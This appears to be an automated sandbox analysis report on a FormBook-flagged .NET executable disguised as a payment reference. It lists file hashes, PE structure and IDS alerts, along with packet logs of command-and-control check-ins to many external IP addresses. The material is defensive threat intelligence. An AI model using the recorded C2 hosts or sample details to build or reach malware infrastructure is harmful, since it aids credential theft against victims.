SHA-512:	75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
Malicious:	true
Reputation:	high, very likely benign file
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

C:\Users\user\AppData\Local\Temp\Ea64OHKq

Download File

Process:	C:\Windows\SysWOW64\colorcpl.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
Category:	dropped
Size (bytes):	196608
Entropy (8bit):	1.121297215059106
Encrypted:	false
SSDEEP:	384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
MD5:	D87270D0039ED3A5A72E7082EA71E305
SHA1:	0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
SHA-256:	F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
SHA-512:	18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
Malicious:	false
Reputation:	high, very likely benign file
Preview:	SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit):	7.95490866173538
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 49.80% Win32 Executable (generic) a (10002005/4) 49.75% Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36% Windows Screen Saver (13104/52) 0.07% Generic Win/DOS Executable (2004/3) 0.01%
File name:	NF_Payment_Ref_FAN930276.exe
File size:	754'688 bytes
MD5:	7c86cd8c446e881a00e02c3c9cb629a7
SHA1:	6f52b3667ce3c56576b80a9748ff283dd7bffecc
SHA256:	0bc8eae9fe2dc6af83e1b798f9a6b5ef27117c5b8462664a944fca34a4e1e464
SHA512:	ba1279c1acd311f50d9d47c7cf8086a924df17a9759ed307806778a3bc70a65b2402fcec53d333ae2b523ad1a2a1100c29dc74b425fd250d1bfe0161ee53b50b
SSDEEP:	12288:flaDPw1Qk89TmyMhoiebDYaRhuJfQrDAyZ0eqdXr58EsdU/uqENH1tI:fsLw9gTFMSien1icAyZ0eqdXr58r0uxi
TLSH:	6FF42304B3ECC722D97A4FFB55A1044043F775937AA6E3CC9D9951C91EA7B600BA8B0B
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....!g..............0..x..........R.... ........@.. ....................................@................................

File Icon


Icon Hash:	00928e8e8686b000

Static PE Info

General

Entrypoint:	0x4b9652
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0x6721DC95 [Wed Oct 30 07:13:25 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	f34d5f2d4577ed6d9ceec516c1f5a744

Entrypoint Preview

Instruction
jmp dword ptr [00402000h]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0xb95ff	0x4f	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0xba000	0x624	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0xbc000	0xc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0xb6e84	0x54	.text
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2000	0x8	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x2008	0x48	.text
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x2000	0xb7658	0xb7800	d582149dd3b2ec79036033b18419d971	False	0.9622799408208447	data	7.961870823763204	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc	0xba000	0x624	0x800	2fe68f33def8432192cef1ca33f653b3	False	0.33740234375	data	3.4535536507102003	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0xbc000	0xc	0x200	152c521101e711ad30fd58f0c7bf5b64	False	0.044921875	data	0.10191042566270775	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_VERSION	0xba090	0x394	OpenPGP Secret Key			0.4203056768558952
RT_MANIFEST	0xba434	0x1ea	XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators			0.5489795918367347

Imports

DLL	Import
mscoree.dll	_CorExeMain

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-11-01T03:45:18.153762+0100	2022930	ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow	1	172.202.163.200	443	192.168.2.5	49709	TCP
2024-11-01T03:45:36.776192+0100	2855465	ETPRO MALWARE FormBook CnC Checkin (GET) M2	1	192.168.2.5	49791	3.33.130.190	80	TCP
2024-11-01T03:45:52.815640+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.5	49881	141.193.213.10	80	TCP
2024-11-01T03:45:55.384550+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.5	49896	141.193.213.10	80	TCP
2024-11-01T03:45:56.666032+0100	2022930	ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow	1	172.202.163.200	443	192.168.2.5	49901	TCP
2024-11-01T03:45:57.930617+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.5	49912	141.193.213.10	80	TCP
2024-11-01T03:46:00.485826+0100	2855465	ETPRO MALWARE FormBook CnC Checkin (GET) M2	1	192.168.2.5	49927	141.193.213.10	80	TCP
2024-11-01T03:46:06.527656+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.5	49959	8.210.3.99	80	TCP
2024-11-01T03:46:09.074545+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.5	49975	8.210.3.99	80	TCP
2024-11-01T03:46:11.637053+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.5	49988	8.210.3.99	80	TCP
2024-11-01T03:46:14.199539+0100	2855465	ETPRO MALWARE FormBook CnC Checkin (GET) M2	1	192.168.2.5	49989	8.210.3.99	80	TCP
2024-11-01T03:46:20.178900+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.5	49990	162.0.215.244	80	TCP
2024-11-01T03:46:22.713312+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.5	49991	162.0.215.244	80	TCP
2024-11-01T03:46:25.247897+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.5	49992	162.0.215.244	80	TCP
2024-11-01T03:46:27.801524+0100	2855465	ETPRO MALWARE FormBook CnC Checkin (GET) M2	1	192.168.2.5	49993	162.0.215.244	80	TCP
2024-11-01T03:46:33.645276+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.5	49994	162.0.231.203	80	TCP
2024-11-01T03:46:36.183248+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.5	49995	162.0.231.203	80	TCP
2024-11-01T03:46:38.696337+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.5	49996	162.0.231.203	80	TCP
2024-11-01T03:46:41.260366+0100	2855465	ETPRO MALWARE FormBook CnC Checkin (GET) M2	1	192.168.2.5	49997	162.0.231.203	80	TCP
2024-11-01T03:46:47.294067+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.5	49998	103.71.154.12	80	TCP
2024-11-01T03:46:50.375712+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.5	49999	103.71.154.12	80	TCP
2024-11-01T03:46:52.904179+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.5	50000	103.71.154.12	80	TCP
2024-11-01T03:46:55.480773+0100	2855465	ETPRO MALWARE FormBook CnC Checkin (GET) M2	1	192.168.2.5	50001	103.71.154.12	80	TCP
2024-11-01T03:47:01.298157+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.5	50002	3.33.130.190	80	TCP
2024-11-01T03:47:03.840243+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.5	50003	3.33.130.190	80	TCP
2024-11-01T03:47:06.374480+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.5	50004	3.33.130.190	80	TCP
2024-11-01T03:47:08.941143+0100	2855465	ETPRO MALWARE FormBook CnC Checkin (GET) M2	1	192.168.2.5	50005	3.33.130.190	80	TCP
2024-11-01T03:47:15.496533+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.5	50006	3.33.130.190	80	TCP
2024-11-01T03:47:17.162260+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.5	50007	3.33.130.190	80	TCP
2024-11-01T03:47:19.688882+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.5	50008	3.33.130.190	80	TCP
2024-11-01T03:47:22.457127+0100	2855465	ETPRO MALWARE FormBook CnC Checkin (GET) M2	1	192.168.2.5	50009	3.33.130.190	80	TCP
2024-11-01T03:47:28.199080+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.5	50010	199.59.243.227	80	TCP
2024-11-01T03:47:30.746588+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.5	50011	199.59.243.227	80	TCP
2024-11-01T03:47:33.312596+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.5	50012	199.59.243.227	80	TCP
2024-11-01T03:47:35.825066+0100	2855465	ETPRO MALWARE FormBook CnC Checkin (GET) M2	1	192.168.2.5	50013	199.59.243.227	80	TCP
2024-11-01T03:47:41.591618+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.5	50014	13.248.169.48	80	TCP
2024-11-01T03:47:44.099404+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.5	50015	13.248.169.48	80	TCP
2024-11-01T03:47:46.622150+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.5	50016	13.248.169.48	80	TCP
2024-11-01T03:47:49.208347+0100	2855465	ETPRO MALWARE FormBook CnC Checkin (GET) M2	1	192.168.2.5	50017	13.248.169.48	80	TCP
2024-11-01T03:47:55.556278+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.5	50018	38.88.82.56	80	TCP
2024-11-01T03:47:58.080888+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.5	50019	38.88.82.56	80	TCP
2024-11-01T03:48:00.652282+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.5	50020	38.88.82.56	80	TCP
2024-11-01T03:48:03.206943+0100	2855465	ETPRO MALWARE FormBook CnC Checkin (GET) M2	1	192.168.2.5	50021	38.88.82.56	80	TCP
2024-11-01T03:48:08.920254+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.5	50022	3.33.130.190	80	TCP
2024-11-01T03:48:11.486250+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.5	50023	3.33.130.190	80	TCP
2024-11-01T03:48:14.044588+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.5	50024	3.33.130.190	80	TCP
2024-11-01T03:48:16.588599+0100	2855465	ETPRO MALWARE FormBook CnC Checkin (GET) M2	1	192.168.2.5	50025	3.33.130.190	80	TCP
2024-11-01T03:48:22.480786+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.5	50026	178.79.184.196	80	TCP
2024-11-01T03:48:25.699766+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.5	50027	178.79.184.196	80	TCP
2024-11-01T03:48:27.646265+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.5	50028	178.79.184.196	80	TCP
2024-11-01T03:48:30.137036+0100	2855465	ETPRO MALWARE FormBook CnC Checkin (GET) M2	1	192.168.2.5	50029	178.79.184.196	80	TCP
2024-11-01T03:48:44.206759+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.5	50030	188.114.96.3	80	TCP
2024-11-01T03:48:46.746198+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.5	50031	188.114.96.3	80	TCP
2024-11-01T03:48:49.309149+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.5	50032	188.114.96.3	80	TCP
2024-11-01T03:48:51.879696+0100	2855465	ETPRO MALWARE FormBook CnC Checkin (GET) M2	1	192.168.2.5	50033	188.114.96.3	80	TCP
2024-11-01T03:48:59.199686+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.5	50034	103.191.208.137	80	TCP
2024-11-01T03:49:01.748539+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.5	50035	103.191.208.137	80	TCP
2024-11-01T03:49:04.496536+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.5	50036	103.191.208.137	80	TCP
2024-11-01T03:49:08.027742+0100	2855465	ETPRO MALWARE FormBook CnC Checkin (GET) M2	1	192.168.2.5	50037	103.191.208.137	80	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 1, 2024 03:45:36.145128012 CET	49791	80	192.168.2.5	3.33.130.190
Nov 1, 2024 03:45:36.150197983 CET	80	49791	3.33.130.190	192.168.2.5
Nov 1, 2024 03:45:36.150294065 CET	49791	80	192.168.2.5	3.33.130.190
Nov 1, 2024 03:45:36.158591032 CET	49791	80	192.168.2.5	3.33.130.190
Nov 1, 2024 03:45:36.164093971 CET	80	49791	3.33.130.190	192.168.2.5
Nov 1, 2024 03:45:36.775532007 CET	80	49791	3.33.130.190	192.168.2.5
Nov 1, 2024 03:45:36.776144028 CET	80	49791	3.33.130.190	192.168.2.5
Nov 1, 2024 03:45:36.776191950 CET	49791	80	192.168.2.5	3.33.130.190
Nov 1, 2024 03:45:36.778795958 CET	49791	80	192.168.2.5	3.33.130.190
Nov 1, 2024 03:45:36.783543110 CET	80	49791	3.33.130.190	192.168.2.5
Nov 1, 2024 03:45:52.116564989 CET	49881	80	192.168.2.5	141.193.213.10
Nov 1, 2024 03:45:52.121527910 CET	80	49881	141.193.213.10	192.168.2.5
Nov 1, 2024 03:45:52.121608973 CET	49881	80	192.168.2.5	141.193.213.10
Nov 1, 2024 03:45:52.132998943 CET	49881	80	192.168.2.5	141.193.213.10
Nov 1, 2024 03:45:52.137865067 CET	80	49881	141.193.213.10	192.168.2.5
Nov 1, 2024 03:45:52.815510988 CET	80	49881	141.193.213.10	192.168.2.5
Nov 1, 2024 03:45:52.815582037 CET	80	49881	141.193.213.10	192.168.2.5
Nov 1, 2024 03:45:52.815633059 CET	80	49881	141.193.213.10	192.168.2.5
Nov 1, 2024 03:45:52.815639973 CET	49881	80	192.168.2.5	141.193.213.10
Nov 1, 2024 03:45:52.815668106 CET	80	49881	141.193.213.10	192.168.2.5
Nov 1, 2024 03:45:52.815704107 CET	80	49881	141.193.213.10	192.168.2.5
Nov 1, 2024 03:45:52.815720081 CET	49881	80	192.168.2.5	141.193.213.10
Nov 1, 2024 03:45:52.815757990 CET	80	49881	141.193.213.10	192.168.2.5
Nov 1, 2024 03:45:52.815805912 CET	49881	80	192.168.2.5	141.193.213.10
Nov 1, 2024 03:45:52.816549063 CET	80	49881	141.193.213.10	192.168.2.5
Nov 1, 2024 03:45:52.816617966 CET	49881	80	192.168.2.5	141.193.213.10
Nov 1, 2024 03:45:53.637104034 CET	49881	80	192.168.2.5	141.193.213.10
Nov 1, 2024 03:45:54.655709982 CET	49896	80	192.168.2.5	141.193.213.10
Nov 1, 2024 03:45:54.660540104 CET	80	49896	141.193.213.10	192.168.2.5
Nov 1, 2024 03:45:54.660621881 CET	49896	80	192.168.2.5	141.193.213.10
Nov 1, 2024 03:45:54.671297073 CET	49896	80	192.168.2.5	141.193.213.10
Nov 1, 2024 03:45:54.676067114 CET	80	49896	141.193.213.10	192.168.2.5
Nov 1, 2024 03:45:55.384452105 CET	80	49896	141.193.213.10	192.168.2.5
Nov 1, 2024 03:45:55.384497881 CET	80	49896	141.193.213.10	192.168.2.5
Nov 1, 2024 03:45:55.384507895 CET	80	49896	141.193.213.10	192.168.2.5
Nov 1, 2024 03:45:55.384550095 CET	49896	80	192.168.2.5	141.193.213.10
Nov 1, 2024 03:45:55.384597063 CET	80	49896	141.193.213.10	192.168.2.5
Nov 1, 2024 03:45:55.384608984 CET	80	49896	141.193.213.10	192.168.2.5
Nov 1, 2024 03:45:55.384618998 CET	80	49896	141.193.213.10	192.168.2.5
Nov 1, 2024 03:45:55.384629965 CET	80	49896	141.193.213.10	192.168.2.5
Nov 1, 2024 03:45:55.384637117 CET	49896	80	192.168.2.5	141.193.213.10
Nov 1, 2024 03:45:55.384663105 CET	49896	80	192.168.2.5	141.193.213.10
Nov 1, 2024 03:45:55.384673119 CET	80	49896	141.193.213.10	192.168.2.5
Nov 1, 2024 03:45:55.384769917 CET	49896	80	192.168.2.5	141.193.213.10
Nov 1, 2024 03:45:55.386553049 CET	80	49896	141.193.213.10	192.168.2.5
Nov 1, 2024 03:45:55.386599064 CET	49896	80	192.168.2.5	141.193.213.10
Nov 1, 2024 03:45:56.183999062 CET	49896	80	192.168.2.5	141.193.213.10
Nov 1, 2024 03:45:57.205090046 CET	49912	80	192.168.2.5	141.193.213.10
Nov 1, 2024 03:45:57.209891081 CET	80	49912	141.193.213.10	192.168.2.5
Nov 1, 2024 03:45:57.209983110 CET	49912	80	192.168.2.5	141.193.213.10
Nov 1, 2024 03:45:57.221460104 CET	49912	80	192.168.2.5	141.193.213.10
Nov 1, 2024 03:45:57.226349115 CET	80	49912	141.193.213.10	192.168.2.5
Nov 1, 2024 03:45:57.226388931 CET	80	49912	141.193.213.10	192.168.2.5
Nov 1, 2024 03:45:57.930557966 CET	80	49912	141.193.213.10	192.168.2.5
Nov 1, 2024 03:45:57.930572033 CET	80	49912	141.193.213.10	192.168.2.5
Nov 1, 2024 03:45:57.930583954 CET	80	49912	141.193.213.10	192.168.2.5
Nov 1, 2024 03:45:57.930617094 CET	49912	80	192.168.2.5	141.193.213.10
Nov 1, 2024 03:45:57.930649996 CET	80	49912	141.193.213.10	192.168.2.5
Nov 1, 2024 03:45:57.930660963 CET	80	49912	141.193.213.10	192.168.2.5
Nov 1, 2024 03:45:57.930670977 CET	80	49912	141.193.213.10	192.168.2.5
Nov 1, 2024 03:45:57.930711031 CET	49912	80	192.168.2.5	141.193.213.10
Nov 1, 2024 03:45:57.930711031 CET	49912	80	192.168.2.5	141.193.213.10
Nov 1, 2024 03:45:57.932379007 CET	80	49912	141.193.213.10	192.168.2.5
Nov 1, 2024 03:45:57.932439089 CET	49912	80	192.168.2.5	141.193.213.10
Nov 1, 2024 03:45:58.730906010 CET	49912	80	192.168.2.5	141.193.213.10
Nov 1, 2024 03:45:59.749751091 CET	49927	80	192.168.2.5	141.193.213.10
Nov 1, 2024 03:45:59.754895926 CET	80	49927	141.193.213.10	192.168.2.5
Nov 1, 2024 03:45:59.754997969 CET	49927	80	192.168.2.5	141.193.213.10
Nov 1, 2024 03:45:59.761868954 CET	49927	80	192.168.2.5	141.193.213.10
Nov 1, 2024 03:45:59.766686916 CET	80	49927	141.193.213.10	192.168.2.5
Nov 1, 2024 03:46:00.483177900 CET	80	49927	141.193.213.10	192.168.2.5
Nov 1, 2024 03:46:00.485709906 CET	80	49927	141.193.213.10	192.168.2.5
Nov 1, 2024 03:46:00.485826015 CET	49927	80	192.168.2.5	141.193.213.10
Nov 1, 2024 03:46:00.486803055 CET	49927	80	192.168.2.5	141.193.213.10
Nov 1, 2024 03:46:00.491956949 CET	80	49927	141.193.213.10	192.168.2.5
Nov 1, 2024 03:46:05.516423941 CET	49959	80	192.168.2.5	8.210.3.99
Nov 1, 2024 03:46:05.521524906 CET	80	49959	8.210.3.99	192.168.2.5
Nov 1, 2024 03:46:05.521598101 CET	49959	80	192.168.2.5	8.210.3.99
Nov 1, 2024 03:46:05.532295942 CET	49959	80	192.168.2.5	8.210.3.99
Nov 1, 2024 03:46:05.539143085 CET	80	49959	8.210.3.99	192.168.2.5
Nov 1, 2024 03:46:06.480633974 CET	80	49959	8.210.3.99	192.168.2.5
Nov 1, 2024 03:46:06.527656078 CET	49959	80	192.168.2.5	8.210.3.99
Nov 1, 2024 03:46:06.661179066 CET	80	49959	8.210.3.99	192.168.2.5
Nov 1, 2024 03:46:06.661225080 CET	49959	80	192.168.2.5	8.210.3.99
Nov 1, 2024 03:46:07.043334007 CET	49959	80	192.168.2.5	8.210.3.99
Nov 1, 2024 03:46:08.062478065 CET	49975	80	192.168.2.5	8.210.3.99
Nov 1, 2024 03:46:08.067323923 CET	80	49975	8.210.3.99	192.168.2.5
Nov 1, 2024 03:46:08.067435980 CET	49975	80	192.168.2.5	8.210.3.99
Nov 1, 2024 03:46:08.078345060 CET	49975	80	192.168.2.5	8.210.3.99
Nov 1, 2024 03:46:08.091316938 CET	80	49975	8.210.3.99	192.168.2.5
Nov 1, 2024 03:46:09.023706913 CET	80	49975	8.210.3.99	192.168.2.5
Nov 1, 2024 03:46:09.074544907 CET	49975	80	192.168.2.5	8.210.3.99
Nov 1, 2024 03:46:09.204931974 CET	80	49975	8.210.3.99	192.168.2.5
Nov 1, 2024 03:46:09.205008030 CET	49975	80	192.168.2.5	8.210.3.99
Nov 1, 2024 03:46:09.590316057 CET	49975	80	192.168.2.5	8.210.3.99
Nov 1, 2024 03:46:10.609230042 CET	49988	80	192.168.2.5	8.210.3.99
Nov 1, 2024 03:46:10.614100933 CET	80	49988	8.210.3.99	192.168.2.5
Nov 1, 2024 03:46:10.614186049 CET	49988	80	192.168.2.5	8.210.3.99
Nov 1, 2024 03:46:10.624748945 CET	49988	80	192.168.2.5	8.210.3.99
Nov 1, 2024 03:46:10.629612923 CET	80	49988	8.210.3.99	192.168.2.5
Nov 1, 2024 03:46:10.629837990 CET	80	49988	8.210.3.99	192.168.2.5
Nov 1, 2024 03:46:11.596034050 CET	80	49988	8.210.3.99	192.168.2.5
Nov 1, 2024 03:46:11.637053013 CET	49988	80	192.168.2.5	8.210.3.99
Nov 1, 2024 03:46:11.787149906 CET	80	49988	8.210.3.99	192.168.2.5
Nov 1, 2024 03:46:11.787233114 CET	49988	80	192.168.2.5	8.210.3.99
Nov 1, 2024 03:46:12.137151957 CET	49988	80	192.168.2.5	8.210.3.99
Nov 1, 2024 03:46:13.161997080 CET	49989	80	192.168.2.5	8.210.3.99
Nov 1, 2024 03:46:13.168853998 CET	80	49989	8.210.3.99	192.168.2.5
Nov 1, 2024 03:46:13.168921947 CET	49989	80	192.168.2.5	8.210.3.99
Nov 1, 2024 03:46:13.176136971 CET	49989	80	192.168.2.5	8.210.3.99
Nov 1, 2024 03:46:13.181934118 CET	80	49989	8.210.3.99	192.168.2.5
Nov 1, 2024 03:46:14.150746107 CET	80	49989	8.210.3.99	192.168.2.5
Nov 1, 2024 03:46:14.199538946 CET	49989	80	192.168.2.5	8.210.3.99
Nov 1, 2024 03:46:14.335551023 CET	80	49989	8.210.3.99	192.168.2.5
Nov 1, 2024 03:46:14.335702896 CET	49989	80	192.168.2.5	8.210.3.99
Nov 1, 2024 03:46:14.336599112 CET	49989	80	192.168.2.5	8.210.3.99
Nov 1, 2024 03:46:14.350769997 CET	80	49989	8.210.3.99	192.168.2.5
Nov 1, 2024 03:46:19.473397970 CET	49990	80	192.168.2.5	162.0.215.244
Nov 1, 2024 03:46:19.478319883 CET	80	49990	162.0.215.244	192.168.2.5
Nov 1, 2024 03:46:19.478400946 CET	49990	80	192.168.2.5	162.0.215.244
Nov 1, 2024 03:46:19.488913059 CET	49990	80	192.168.2.5	162.0.215.244
Nov 1, 2024 03:46:19.493722916 CET	80	49990	162.0.215.244	192.168.2.5
Nov 1, 2024 03:46:20.178785086 CET	80	49990	162.0.215.244	192.168.2.5
Nov 1, 2024 03:46:20.178828955 CET	80	49990	162.0.215.244	192.168.2.5
Nov 1, 2024 03:46:20.178877115 CET	80	49990	162.0.215.244	192.168.2.5
Nov 1, 2024 03:46:20.178900003 CET	49990	80	192.168.2.5	162.0.215.244
Nov 1, 2024 03:46:20.178958893 CET	80	49990	162.0.215.244	192.168.2.5
